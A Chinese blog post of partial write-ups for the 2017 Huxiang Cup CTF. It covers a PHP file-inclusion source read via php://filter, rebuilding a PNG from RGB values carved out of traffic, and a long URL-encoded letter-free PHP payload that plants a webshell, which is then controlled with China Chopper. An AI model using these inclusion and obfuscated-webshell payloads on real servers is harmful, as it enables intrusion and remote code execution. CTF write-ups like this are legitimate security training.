hxb 2017 部分题解
来源:互联网 发布:清华直博生待遇 知乎 编辑:程序博客网 时间:2024/06/06 08:37
0x00 前言
作为一名菜鸡,挤出了一点时间来做了做今年的湖湘杯,快结束的时候看了看题目,就做出了三道题,和大家分享下。
0x01 第一题 web200
拿道题目本以为是文件上传,但是试了几个方法没成功,随便点了点,看到了url中op参数,感觉是php文件包含漏洞
试了试,得到了index.php的源码
0x02 使用php://filter 读取源码
在使用php:filter协议获取源码时,需要注意”resource=index”这里不能有后缀,经过查看index源码,确实不需要后缀,后缀在源码进行了拼接。
<?phperror_reporting(0);define('FROM_INDEX', 1);$op = empty($_GET['op']) ? 'home' : $_GET['op'];if(!is_string($op) || preg_match('/\.\./', $op)) die('Try it again and I will kill you! I freaking hate hackers!');ob_start('ob_gzhandler');function page_top($op) {?><!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>Panduploader::<?= htmlentities(ucfirst($op)); ?></title></head><body> <div id="header"> <center><a href="?op=home" class="logo"><img src="images/logo.jpg" alt=""></a></center> </div> <div id="body"><?php}function fatal($msg) {?><div class="article"><h2>Error</h2><p><?=$msg;?></p></div><?phpexit(1);}function page_bottom() {?> </div> <center> <div id="footer"> <div> <p> <span>2017 © </span> All rights reserved. </p> </div> </div> </center></body></html><?phpob_end_flush();}register_shutdown_function('page_bottom');page_top($op);if(!(include $op . '.php')) fatal('no such page');?>
0x03 获取flag
url中输入flag.php ,发现有这个文件,直接读取源码,获取flag
http://114.215.129.72:10080/?op=php://filter/read=convert.base64-encode/resource=flag
0x04 第二题 MISC流量分析
查看http流发现有flag.zip
追踪TCP流将flag.zip的hex放入winhex中,保存为flag.zip
解压出一个ce.txt
打开一看,开始以为是二维码,结果做了半天也没弄出来,后来发现是RGB还原出png的图片
cat -n ce.txt | tail -n 198457 254, 255, 255
可以看到一共有98457行,可以生成一张887x111的图片(一般这样的图片flag为一长串,所以试了试这个规格的图片)
使用脚本生成png图片
#! /usr/bin/python2.7from PIL import Imagex = 887y = 111im = Image.new('RGB',(x,y))file = open('ce.txt')for i in range(0,x): for j in range(0,y): line = file.readline() lst = line.split(',') im.putpixel((i,j),(int(lst[0]),int(lst[1]),int(lst[2])))im.show()im.save('flag.png')
0x05 第三题 web300
经过尝试,过滤了字母、数字和一些符号,需要上传一个 webshell
找到p牛的文章,提到了一种利用类型转换的 webshell。
Payload
http://114.215.133.202:10080/?content=$_=%27%27;$_[%2b$_]%2b%2b;$_=$_.%27%27;$__=$_[%2b%27%27];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____=%27_%27;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);
使用菜刀连接 密码为“_”
阅读全文
0 0
- hxb 2017 部分题解
- 2017年多校联训1 部分题解
- 2017年多校联训2 部分题解
- 2017年多校联训3 部分题解
- 2017年多校联训8 部分题解
- 2017年多校联训9 部分题解
- 2017哈尔滨ccpc部分题解
- 2017 GPLT-大区赛-L1部分题解
- GCJ Qualification Round 2017 题解(部分)
- 2017 沈阳区域赛部分题解
- 湖湘杯 2017 复赛Web部分题解
- usaco题解汇总部分
- cqoi2015部分题解
- NOIP2014部分题解
- Codeforces Round332 部分题解
- foj部分题解
- ABCTF-2016-部分题解
- Codeforences #368 部分题解
- 安装icephp 记
- 线程范围内共享数据
- Primitive Root 原根
- Linux下安装ICE(自测)
- 17.12.4日报
- hxb 2017 部分题解
- Nginx的安装目录详解
- php变量定义和输出
- 在命令行下,如何使用JAD反编译jar文件
- 回溯进阶---迭代深搜IDA*---埃及分数
- 用c语言创建一个窗口
- ASCII、GB2312、GBK、Unicode、UTF-8、UTF-16 编码方式比较分析
- qsort( )使用和实现
- 杭电ACM OJ 1033 Edge 本题考查英文过了6级没有和谷歌翻译的使用